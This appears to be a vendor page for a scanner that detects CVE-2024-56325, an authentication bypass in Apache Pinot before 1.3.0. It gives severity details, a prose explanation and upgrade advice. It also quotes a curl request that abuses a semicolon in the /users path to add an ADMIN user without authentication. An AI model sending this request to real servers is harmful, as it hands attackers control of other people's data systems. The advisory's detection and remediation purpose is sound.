S4E just found a critical-severity finding from cve-2022-27924 scanner
PlatformPlansPartners
Resources
ToolsBlogDocs
Sign Up →
critical·Product Based Web Vulnerabilities·Updated Apr 3, 2025

CVE-2024-56325 Scanner

CVE-2024-56325 Scanner - Authentication Bypass vulnerability in Apache Pinot

Est. Time~10 seconds
Scan TypeSingle Scan
Targetsdomain, subdomain, ipv4
CostFree
2.3k
Times Used
continuous scan runs
5.9k
Continuously Checked
assets under CS
0
Vulnerabilities Found
confirmed findings
References
CVECVE-2024-56325
9.8
CVSScritical
Exploitable remotely over the internet · no authentication required.

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

Attack Vector
Network
Privileges Req.
None
User Interaction
None
Affected
Apache Pinotby Apache Software Foundation
AFFECTED< 1.3SAFE ✓≥ 1.3
Updated Aug 22, 2026View on NVD →
Detail

Apache Pinot is commonly used in analytics platforms for processing and analyzing large datasets in real time. The software is deployed by engineering teams in enterprises to serve user-facing analytical queries at low latency. It helps companies in exploratory data analysis and automated reporting needs. Used primarily in data warehouses, it facilitates intuitive query execution for business intelligence insights. Companies often leverage it to power dashboards and analytics applications, benefiting from its open-source community developments. With growing adoption in the cloud sector, it aids organizations in transitioning to scalable data processing solutions.

The vulnerability in Apache Pinot is an Authentication Bypass that allows remote attackers to gain unauthorized access to the system. It primarily affects versions before 1.3.0. The flaw is found within the AuthenticationFilter class and is a result of insufficient neutralization of special characters in a URI. Attackers can exploit this flaw to bypass the authentication mechanisms put in place, thus gaining unauthorized access. The risk associated with this vulnerability is critical due to the potential for unauthorized data access. Safeguarding against this vulnerability is crucial in maintaining the integrity of systems using Apache Pinot.

The technical details of the Authentication Bypass involve manipulating specific endpoints accessible through unauthorized requests. Attackers can utilize particular URIs containing special characters to bypass authorization checks. The AuthenticationFilter class fails to restrict these manipulations, leading to potential unauthorized data access via HTTP requests. Specifically, the use of a semicolon in requests can deceive the system into thinking the request is legitimate. Successful exploitation results in HTTP 200 responses indicating bypassed authentication and access to sensitive functions or data. Vulnerability detection typically involves testing for potential unauthorized responses from protected endpoints.

Exploitation of this vulnerability can lead to unauthorized access to sensitive information and systems. Attackers may gain control over data processing functionalities that should be secure from unapproved users. The attack facilitates malicious activities such as data theft, alteration, or unauthorized data injection. Companies using Apache Pinot without the patch can face severe data breaches, potentially affecting business operations and client trust. The risk extends beyond data compromising to include potential system manipulation or denial of services. Mitigating this vulnerability is essential to sustain cybersecurity resilience and organizational security postures.

REFERENCES

Solution Advice
  • Upgrade Apache Pinot to version 1.3.0 or later to patch the vulnerability.
  • Implement network segmentation to reduce access to Apache Pinot endpoints.
  • Consider additional authentication layers like network-level secure authentication or VPNs for accessing sensitive systems.
  • Conduct regular security audits to ensure all third-party libraries are up-to-date with security patches.
  • Restrict access to the Apache Pinot system to specific IPs that are verified and trusted.

Get AI-powered remediation steps tailored to your asset.

Try AI Solutions →

Check your infrastructure.
Right now.

11,000+ scanners. Free to start. No credit card required.